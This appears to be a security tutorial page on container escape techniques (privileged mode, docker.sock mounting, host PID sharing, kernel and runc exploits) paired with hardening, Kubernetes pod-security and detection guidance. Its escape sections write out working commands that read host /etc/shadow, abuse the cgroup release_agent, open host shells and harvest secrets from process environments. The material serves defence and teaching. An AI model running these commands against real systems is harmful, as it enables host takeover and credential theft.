Unverified: AI-generated content.

Container Escape Techniques

Containers provide process isolation, not security isolation. They use Linux kernel features (namespaces, cgroups, capabilities) to create the illusion of a separate system, but every container on a host shares the host's kernel. A container escape occurs when an attacker inside a container breaks out to the host system or into other containers, gaining access they should not have.

Understanding container escape techniques is essential for anyone deploying containers in production, because the default configuration of Docker and Kubernetes is not secure against a determined attacker.

Related: Dirty Pipe & Kernel Exploits | Cloud Misconfigurations | Security Overview


The Container Isolation Model

What Containers Actually Isolate

| Resource | Isolated? | Mechanism | Escape Risk |
|---|---|---|---|
| Filesystem | Partially | Mount namespaces, overlay fs | Volume mounts can expose host paths |
| Process tree | Yes | PID namespaces | --pid=host disables it |
| Network | Yes | Network namespaces | --network=host disables it |
| Users | Partially | User namespaces (if enabled) | Root in container = root on host (by default) |
| Kernel | No | Shared kernel | Any kernel exploit = host compromise |
| Hardware | No | Direct device access possible | --privileged exposes everything |
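Several rows of this table can be checked from inside a running container. A minimal heuristic sketch, assuming a Linux /proc: the kernel gives the initial (host) ipc, uts, user, pid and cgroup namespaces fixed inode numbers (the PROC_*_INIT_INO constants in include/linux/proc_ns.h), so a namespace link carrying one of those inodes is shared with the host. The function names are illustrative, and net and mnt namespaces, which have no fixed inode, are reported as unknown.

```bash
#!/usr/bin/env bash
# Heuristic: the initial (host) ipc/uts/user/pid/cgroup namespaces have fixed
# inode numbers (PROC_*_INIT_INO in include/linux/proc_ns.h). A namespace link
# with one of these inodes is shared with the host.

# classify_ns LINK_TEXT    e.g. classify_ns "pid:[4026531836]"
classify_ns() {
  local link=$1 type ino init
  type=${link%%:*}        # "pid"
  ino=${link##*\[}        # "4026531836]"
  ino=${ino%\]}           # "4026531836"
  case $type in
    ipc)    init=4026531839 ;;
    uts)    init=4026531838 ;;
    user)   init=4026531837 ;;
    pid)    init=4026531836 ;;
    cgroup) init=4026531835 ;;
    *)      echo "$type: unknown"; return 0 ;;   # net, mnt, ...: no fixed inode
  esac
  if [ "$ino" = "$init" ]; then
    echo "$type: host"
  else
    echo "$type: separate"
  fi
}

# Report on the namespaces of the current process (run inside the container).
check_self_ns() {
  local ns
  for ns in ipc uts user pid cgroup; do
    if [ -e "/proc/self/ns/$ns" ]; then
      classify_ns "$(readlink "/proc/self/ns/$ns")"
    fi
  done
}
```

Calling check_self_ns in a default Docker container without user namespace remapping typically prints user: host, which is the "Root in container = root on host" row, and pid: separate; with --pid=host the pid line becomes pid: host.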

Escape 1: Privileged Mode

Running a container with --privileged disables almost all security features. The container process has full access to the host's devices, filesystems, and kernel interfaces.

bash
# DON'T: Running a privileged container
docker run --privileged -it ubuntu bash
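From inside, a privileged container is easiest to recognize by its effective capability set, the CapEff line of /proc/self/status. A minimal sketch: Docker's default set is 00000000a80425fb (14 capabilities), while a privileged container on a recent kernel typically reports 000001ffffffffff, every capability the kernel knows. The helper names are illustrative; CAP_SYS_ADMIN is capability number 21.

```bash
#!/usr/bin/env bash
# count_caps HEXMASK -> number of capability bits set in the mask
count_caps() {
  local v=$(( 16#$1 )) n=0
  while (( v != 0 )); do
    v=$(( v & (v - 1) ))   # clear the lowest set bit
    n=$(( n + 1 ))
  done
  echo "$n"
}

# has_cap HEXMASK BIT -> exit status 0 if capability number BIT is set
has_cap() {
  (( ( (16#$1) >> $2 ) & 1 ))
}

# Inspect the current process; CapEff is the effective capability set.
check_privileged() {
  local mask
  mask=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
  echo "effective capabilities: $(count_caps "$mask")"
  if has_cap "$mask" 21; then   # 21 = CAP_SYS_ADMIN
    echo "CAP_SYS_ADMIN present: treat this container as privileged"
  fi
}
```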

The Escape

bash
# Inside a privileged container — escape to host filesystem

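# Method 1: Mount the host filesystem
# (the device name varies: /dev/sda1, /dev/vda1, /dev/nvme0n1p1, ...;
#  list candidates with: cat /proc/partitions)
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host
# Now /mnt/host contains the host's root filesystem
cat /mnt/host/etc/shadow             # Read host password hashes
chroot /mnt/host                     # Shell rooted in the host filesystem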

# Method 2: Load a kernel module
insmod /path/to/malicious.ko
# The module runs in the host kernel — game over

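# Method 3: Write to host cgroup release_agent
# (Classic cgroup v1 escape technique; needs a writable cgroup v1 hierarchy)
d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)")   # a cgroup dir with release_agent
mkdir -p "$d/escape"
echo 1 > "$d/escape/notify_on_release"
# Host-side path of the container's root filesystem (the overlay upperdir)
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > "$d/release_agent"
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
# A short-lived shell joins the cgroup; when it exits the cgroup is empty,
# and the kernel runs release_agent as root on the host
sh -c "echo \$\$ > $d/escape/cgroup.procs"
sleep 1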
# /output now contains the host's /etc/shadow
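The release_agent technique only works where a cgroup v1 hierarchy is mounted: cgroup v2 has no release_agent file, and many current distributions boot with cgroup v2 only, in which case the ls glob above finds nothing. A minimal sketch that reads the filesystem types from /proc/self/mountinfo; the function name cgroup_version is illustrative.

```bash
#!/usr/bin/env bash
# cgroup_version [MOUNTINFO] -> "v1" if any cgroup v1 hierarchy is mounted,
# "v2" if only the unified (v2) hierarchy is, "none" otherwise
cgroup_version() {
  local file=${1:-/proc/self/mountinfo}
  awk '
    {
      fstype = ""
      # The filesystem type is the field right after the lone "-" separator
      for (i = 1; i <= NF; i++) if ($i == "-") { fstype = $(i + 1); break }
      if (fstype == "cgroup")  v1 = 1
      if (fstype == "cgroup2") v2 = 1
    }
    END {
      if (v1) print "v1"
      else if (v2) print "v2"
      else print "none"
    }' "$file"
}
```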

Never Use --privileged in Production

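--privileged grants the container every capability and access to all host devices, and turns off seccomp and AppArmor/SELinux confinement. The namespaces that remain provide no meaningful isolation. Common cases where teams think they need --privileged: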

  • Docker-in-Docker: Use rootless Docker or kaniko instead
  • Accessing devices: Use --device=/dev/specific-device instead
  • Network tools: Add specific capabilities with --cap-add=NET_ADMIN
  • Debugging: Use ephemeral debug containers, never privileged

Escape 2: Docker Socket Mounting

Mounting the Docker socket (/var/run/docker.sock) into a container gives that container full control of the Docker daemon — which is equivalent to root access on the host.

yaml
# DON'T: Common in CI/CD pipelines
services:
  ci-runner:
    image: gitlab/gitlab-runner
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock

The Escape

bash
# Inside a container with Docker socket mounted

# List all containers on the host
docker ps

# Start a new privileged container with host filesystem mounted
docker run -it --privileged --pid=host \
  -v /:/host ubuntu chroot /host bash

# You now have root access to the host
id   # uid=0(root) gid=0(root)
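The docker CLI is only a convenience: the socket serves the Docker Engine HTTP API, so curl --unix-socket /var/run/docker.sock http://localhost/containers/json returns the same list as docker ps. For auditing (or reconnaissance), a bind-mounted socket appears as its own mount point in /proc/self/mountinfo, where field 5 is the mount point. A sketch with an illustrative function name that also matches containerd's socket:

```bash
#!/usr/bin/env bash
# find_socket_mounts [MOUNTINFO] -> prints mount points ending in docker.sock
# or containerd.sock (a bind-mounted runtime socket)
find_socket_mounts() {
  local file=${1:-/proc/self/mountinfo}
  # Field 5 of each mountinfo line is the mount point in this mount namespace
  awk '$5 ~ /(docker|containerd)\.sock$/ { print $5 }' "$file"
}
```

Inside a container, an empty result from find_socket_mounts means no runtime socket is bind-mounted at a path with those names.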

Alternatives to Docker Socket Mounting

| Need | Insecure Approach | Secure Alternative |
|---|---|---|
| Build images in CI | Mount docker.sock | Use kaniko, buildah, or buildkit (rootless) |
| Monitor containers | Mount docker.sock | Use the Docker API over TLS with client certs (still root-equivalent for whoever holds the cert) |
| Container management | Mount docker.sock | Use the Kubernetes API with RBAC |
| Docker-in-Docker | Mount docker.sock | Use rootless Docker, sysbox, or Podman |

Escape 3: Host PID Namespace

When a container shares the host's PID namespace (--pid=host), processes inside the container can see and interact with all processes on the host.

bash
# DON'T: Sharing host PID namespace
docker run --pid=host -it ubuntu bash

# Inside the container:
# See all host processes
ps aux

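# Read environment variables of host processes (may contain secrets).
# Needs ptrace-level access to the target, typically CAP_SYS_PTRACE
# (--cap-add=SYS_PTRACE or --privileged); Docker's default AppArmor profile can also block it
tr '\0' '\n' < /proc/1/environ
# DB_PASSWORD=s3cr3t
# AWS_ACCESS_KEY_ID=AKIA...

# Enter PID 1's namespaces (needs CAP_SYS_ADMIN and CAP_SYS_PTRACE,
# so in practice the container must also be --privileged)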
nsenter -t 1 -m -u -i -n -p -- /bin/bash
# Full host shell via PID 1's namespaces
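The single-process read above generalizes to every process visible through the shared PID namespace. A sketch, assuming the variable-name patterns below are a reasonable proxy for secrets (they are a guess, not an exhaustive rule); scan_environ is an illustrative name, and entries that cannot be read, which without ptrace-level access will be most host processes, are skipped silently.

```bash
#!/usr/bin/env bash
# scan_environ [PROC_ROOT] -> prints "PID: NAME=value" for variables whose
# names look sensitive (PASSWORD, SECRET, TOKEN, KEY)
scan_environ() {
  local root=${1:-/proc} env pid
  for env in "$root"/[0-9]*/environ; do
    [ -r "$env" ] || continue              # no match or no permission
    pid=${env#"$root"/}; pid=${pid%/environ}
    # environ is NUL-separated; one variable per line, then filter by name.
    # Open errors (e.g. EACCES from the ptrace check) are discarded.
    { tr '\0' '\n' < "$env"; } 2>/dev/null \
      | grep -E '^[A-Za-z0-9_]*(PASSWORD|SECRET|TOKEN|KEY)[A-Za-z0-9_]*=' \
      | sed "s/^/$pid: /"
  done
}
```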

Escape 4: Kernel Exploits from Within Containers

Since containers share the host kernel, any kernel vulnerability exploitable from user space can be used to escape the container. This is the hardest escape to prevent because it does not require any misconfiguration.

Notable kernel exploits used for container escapes:

| CVE | Name | Year | Technique |
|---|---|---|---|
| CVE-2022-0847 | Dirty Pipe | 2022 | Overwrite host files via pipe splice |
| CVE-2016-5195 | Dirty COW | 2016 | Race condition in COW pages |
| CVE-2022-0185 | - | 2022 | Heap overflow in legacy_parse_param |
| CVE-2021-31440 | - | 2021 | eBPF verifier bypass |
| CVE-2022-23222 | - | 2022 | eBPF type confusion |
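Kernel bugs cannot be configured away, but the reachable attack surface can be reduced. CVE-2021-31440 and CVE-2022-23222 are in the eBPF verifier and are typically exploited by loading unprivileged eBPF programs, which the kernel.unprivileged_bpf_disabled sysctl controls (0: allowed, 1: disabled until reboot, 2: disabled, but an administrator can re-enable it). Kernel sysctls are global, so reading the file from inside a container shows the host's setting. A minimal sketch with an illustrative function name:

```bash
#!/usr/bin/env bash
# bpf_unpriv_status [FILE] -> human-readable kernel.unprivileged_bpf_disabled
bpf_unpriv_status() {
  local file=${1:-/proc/sys/kernel/unprivileged_bpf_disabled} v
  if [ ! -r "$file" ]; then
    echo "unknown"
    return 0
  fi
  v=$(cat "$file")
  case $v in
    0) echo "unprivileged eBPF allowed" ;;
    1) echo "unprivileged eBPF disabled (locked until reboot)" ;;
    2) echo "unprivileged eBPF disabled (admin may re-enable)" ;;
    *) echo "unknown" ;;
  esac
}
```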

Escape 5: runc Vulnerabilities (CVE-2019-5736)

runc is the low-level container runtime used by Docker, containerd, and CRI-O. CVE-2019-5736 allowed a malicious container to overwrite the host's runc binary, which runs as root every time a container is started or a process is exec'd into one.

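How It Worked

The attacker controls a file that runc will execute inside the container, such as the image's entrypoint or a binary an administrator is likely to run with docker exec (for example /bin/sh), and replaces it with a script whose interpreter line is #!/proc/self/exe. While runc is starting that process, /proc/self/exe refers to the host's runc binary, so runc ends up re-executing itself inside the container. A process in the container then opens that binary through /proc/<runc-pid>/exe, waits for runc to exit (opening a running executable for writing fails with ETXTBSY), reopens it for writing through the file descriptor it holds, and overwrites it. The next time the host runs runc, for any container, it executes the attacker's payload as root. The fix made runc execute from a sealed in-memory copy of itself (a memfd), so the container never sees the host binary.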

The Supply Chain Angle

CVE-2019-5736 is particularly dangerous in CI/CD environments where untrusted container images are built or tested. A malicious Dockerfile could produce an image that triggers the exploit as soon as a container is started from it, or when an administrator runs docker exec inside such a container.


Defense: Hardening Container Deployments

1. Drop Capabilities

bash
# Drop ALL capabilities, add back only what is needed.
# NET_BIND_SERVICE: only if the app binds to ports < 1024.
# no-new-privileges: setuid binaries and file capabilities cannot raise privileges.
docker run \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --security-opt=no-new-privileges \
  myapp:latest
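To confirm the flags took effect, decode the CapEff mask from /proc/self/status inside the container; for a process running as root with the flags above it should be 0000000000000400, i.e. only CAP_NET_BIND_SERVICE. capsh --decode from libcap does the same job; the sketch below avoids that dependency and hard-codes the capability numbers from linux/capability.h up to CAP_CHECKPOINT_RESTORE (40). decode_caps is an illustrative name.

```bash
#!/usr/bin/env bash
# Capability names indexed by number (CAP_CHOWN = 0 ... CAP_CHECKPOINT_RESTORE = 40)
CAP_NAMES=(CHOWN DAC_OVERRIDE DAC_READ_SEARCH FOWNER FSETID KILL SETGID SETUID
  SETPCAP LINUX_IMMUTABLE NET_BIND_SERVICE NET_BROADCAST NET_ADMIN NET_RAW
  IPC_LOCK IPC_OWNER SYS_MODULE SYS_RAWIO SYS_CHROOT SYS_PTRACE SYS_PACCT
  SYS_ADMIN SYS_BOOT SYS_NICE SYS_RESOURCE SYS_TIME SYS_TTY_CONFIG MKNOD LEASE
  AUDIT_WRITE AUDIT_CONTROL SETFCAP MAC_OVERRIDE MAC_ADMIN SYSLOG WAKE_ALARM
  BLOCK_SUSPEND AUDIT_READ PERFMON BPF CHECKPOINT_RESTORE)

# decode_caps HEXMASK -> space-separated CAP_* names whose bits are set
decode_caps() {
  local v=$(( 16#$1 )) i out=()
  for (( i = 0; i < ${#CAP_NAMES[@]}; i++ )); do
    if (( (v >> i) & 1 )); then
      out+=("CAP_${CAP_NAMES[i]}")
    fi
  done
  echo "${out[*]}"
}
```

Usage inside the container: decode_caps "$(awk '/^CapEff:/ {print $2}' /proc/self/status)".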

2. Read-Only Root Filesystem

bash
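# Writable tmpfs mounts only where the app must write;
# noexec/nosuid: files written there cannot be executed or gain setuid privileges.
docker run \
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid \
  --tmpfs /var/run:rw,noexec,nosuid \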
  myapp:latest
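A read-only root and noexec tmpfs mounts are visible in the per-mount options (field 6) of /proc/self/mountinfo. A minimal checking sketch; mount_has_opt is an illustrative name, and the last matching entry wins because later mounts on the same path stack on top of earlier ones.

```bash
#!/usr/bin/env bash
# mount_has_opt MOUNTPOINT OPTION [MOUNTINFO]
# exit status 0 if MOUNTPOINT is mounted with OPTION among its per-mount options
mount_has_opt() {
  local mp=$1 opt=$2 file=${3:-/proc/self/mountinfo}
  # Field 5 = mount point, field 6 = per-mount options (comma-separated)
  awk -v mp="$mp" -v opt="$opt" '
    $5 == mp {
      seen = 1; found = 0
      n = split($6, o, ",")
      for (i = 1; i <= n; i++) if (o[i] == opt) found = 1
    }
    END { exit !(seen && found) }' "$file"
}
```

Inside the container started above, mount_has_opt / ro and mount_has_opt /tmp noexec should both succeed.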

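3. seccomp Profiles

A seccomp profile sets a default action for every system call and lists the exceptions. The profile below denies everything (SCMP_ACT_ERRNO) and allows a short list. Treat the list as illustrative: real programs need many more syscalls (it lacks execve and openat, for example, so most containers would fail to start with it), so build the allowlist by tracing the application or start from Docker's default profile.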

json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64"],
  "syscalls": [
    {
      "names": [
        "read", "write", "open", "close", "stat", "fstat",
        "mmap", "mprotect", "munmap", "brk", "exit_group",
        "futex", "epoll_wait", "accept", "socket", "bind",
        "listen", "connect", "sendto", "recvfrom"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
bash
docker run \
  --security-opt seccomp=custom-profile.json \
  myapp:latest
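The kernel reports a process's seccomp state on the Seccomp line of /proc/self/status: 0 for none, 1 for strict mode, 2 for a filter such as a Docker profile. A sketch for verifying that a profile is actually applied; seccomp_mode is an illustrative name, and a result of disabled inside a container means seccomp is off, as with --security-opt seccomp=unconfined or --privileged.

```bash
#!/usr/bin/env bash
# seccomp_mode [STATUS_FILE] -> "disabled", "strict", "filter", or "unknown"
seccomp_mode() {
  local file=${1:-/proc/self/status}
  # The "Seccomp:" line holds the mode; "Seccomp_filters:" does not match
  case $(awk '/^Seccomp:/ {print $2}' "$file" 2>/dev/null) in
    0) echo "disabled" ;;
    1) echo "strict" ;;
    2) echo "filter" ;;
    *) echo "unknown" ;;
  esac
}
```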

4. AppArmor / SELinux

bash
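# AppArmor (Debian/Ubuntu); docker-custom must be a profile you have
# written and loaded first (for example with apparmor_parser -r)
docker run --security-opt apparmor=docker-custom myapp:latest

# SELinux (RHEL/CentOS/Fedora); the type must exist in the loaded policy
# (container_t is the standard container type; udica can generate stricter ones)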
docker run --security-opt label=type:container_strict_t myapp:latest
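To check which confinement a container actually got, read /proc/self/attr/current from inside it: it holds an AppArmor profile name with its mode (e.g. docker-default (enforce)) or an SELinux context (e.g. system_u:system_r:container_t:s0:c1,c2). A sketch assuming a single major LSM; on kernels with LSM stacking, per-LSM files such as /proc/self/attr/apparmor/current may also exist. Treating labels containing unconfined or spc_t (the SELinux type used for privileged containers) as unconfined is an assumption of this sketch, and lsm_label is an illustrative name.

```bash
#!/usr/bin/env bash
# lsm_label [ATTR_FILE] -> "confined: LABEL", "unconfined: LABEL", or "unknown"
lsm_label() {
  local file=${1:-/proc/self/attr/current} label
  # The label may end in a newline (AppArmor) or a NUL byte (SELinux); drop NULs
  label=$( { tr -d '\0' < "$file"; } 2>/dev/null ) || { echo "unknown"; return 0; }
  case $label in
    '')                   echo "unknown" ;;
    *unconfined*|*spc_t*) echo "unconfined: $label" ;;
    *)                    echo "confined: $label" ;;
  esac
}
```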

5. User Namespace Remapping

In /etc/docker/daemon.json (restart the Docker daemon afterwards):

json
{
  "userns-remap": "default"
}

This maps root (UID 0) inside the container to an unprivileged user on the host. Even if an attacker escapes the container as "root," they are an unprivileged user on the host.
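Inside the container, /proc/self/uid_map shows the remapping as lines of <first UID inside> <first UID outside> <count>. With userns-remap set to default, Docker creates a dockremap user and takes its range from /etc/subuid, so a line such as 0 100000 65536 (the exact numbers depend on /etc/subuid) means container root is host UID 100000; without remapping the file reads 0 0 4294967295. A sketch that translates a container UID to its host UID; host_uid is an illustrative name.

```bash
#!/usr/bin/env bash
# host_uid CONTAINER_UID [UID_MAP] -> host UID that CONTAINER_UID maps to,
# or "unmapped" if no line of the map covers it
host_uid() {
  local uid=$1 file=${2:-/proc/self/uid_map}
  # Each uid_map line: <first uid inside> <first uid outside> <range length>
  awk -v uid="$uid" '
    uid >= $1 && uid < $1 + $3 { print $2 + (uid - $1); found = 1; exit }
    END { if (!found) print "unmapped" }' "$file"
}
```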


Stronger Isolation Runtimes

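When hardened containers are not enough, use a runtime that puts a separate kernel (gVisor's user-space kernel) or a virtual machine boundary (Kata Containers, Firecracker) between the workload and the host kernel: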

| Runtime | Isolation Level | Typical Overhead (workload-dependent) | Use Case |
|---|---|---|---|
| runc (default) | Namespaces/cgroups | Minimal | Trusted workloads |
| gVisor | User-space kernel | 5-30% | Untrusted code, FaaS |
| Kata Containers | Lightweight VM | 10-20% | Multi-tenant, compliance |
| Firecracker | microVM | 5-15% | AWS Lambda, serverless |

Choosing the Right Isolation

  • Trusted code, single tenant: Standard containers with hardening (seccomp, AppArmor, no-new-privileges)
  • Untrusted code: gVisor or Firecracker — do not rely on kernel namespace isolation
  • Compliance requirements: Kata Containers provide VM-level isolation that auditors understand
  • Multi-tenant platforms: Firecracker microVMs (used by AWS Lambda and Fly.io)

Kubernetes-Specific Risks

Pod Security Standards

yaml
# PodSecurity admission controller — enforce restricted profile
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted

Dangerous Kubernetes Configurations

yaml
# DON'T: These configurations enable container escape

# Privileged pod
spec:
  containers:
    - name: app
      securityContext:
        privileged: true
---
# Host PID namespace
spec:
  hostPID: true
---
# Host network namespace
spec:
  hostNetwork: true
---
# Host path volume mount
spec:
  volumes:
    - name: host-root
      hostPath:
        path: /
---
# Docker socket mount
spec:
  volumes:
    - name: docker-sock
      hostPath:
        path: /var/run/docker.sock

Secure Pod Configuration

yaml
# DO: Hardened pod security context
apiVersion: v1
kind: Pod
metadata:
  name: secure-app
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 10000
    fsGroup: 10000
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: app
      image: myapp:v1.2.3@sha256:abc123...       # Pin by digest
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"]                          
      resources:
        limits:
          cpu: "500m"
          memory: "256Mi"

Detection

bash
# Detect containers running as privileged
docker ps -q | xargs -r docker inspect --format \
  '{{.Name}}: Privileged={{.HostConfig.Privileged}}' | grep 'Privileged=true'

# Detect containers with docker.sock mounted
docker ps -q | xargs -r docker inspect --format \
  '{{.Name}}: {{range .Mounts}}{{.Source}} {{end}}' | grep docker.sock

# Detect containers with host PID namespace
docker ps -q | xargs -r docker inspect --format \
  '{{.Name}}: PidMode={{.HostConfig.PidMode}}' | grep 'PidMode=host'

# Kubernetes: find privileged pods (regular and init containers, one line per pod)
kubectl get pods -A -o json | jq -r '
  .items[]
  | select(any((.spec.containers + (.spec.initContainers // []))[];
               .securityContext.privileged == true))
  | "\(.metadata.namespace)/\(.metadata.name)"'

Key Takeaways

| Lesson | Implication |
|---|---|
| Containers are not security boundaries | They provide isolation, not containment; the shared kernel is the weak link |
| Default configurations are insecure | Docker and Kubernetes defaults prioritize ease of use over security |
| Privileged mode = no containment | --privileged removes nearly all container security features |
| Docker socket = root access | Mounting docker.sock is equivalent to giving the container root on the host |
| Kernel exploits bypass everything | Hardening such as seccomp can shrink the reachable attack surface, but it cannot fix a kernel bug; patch the host kernel |
| Stronger runtimes exist | gVisor, Kata, and Firecracker provide stronger isolation when needed |


"What I cannot create, I do not understand." — Richard Feynman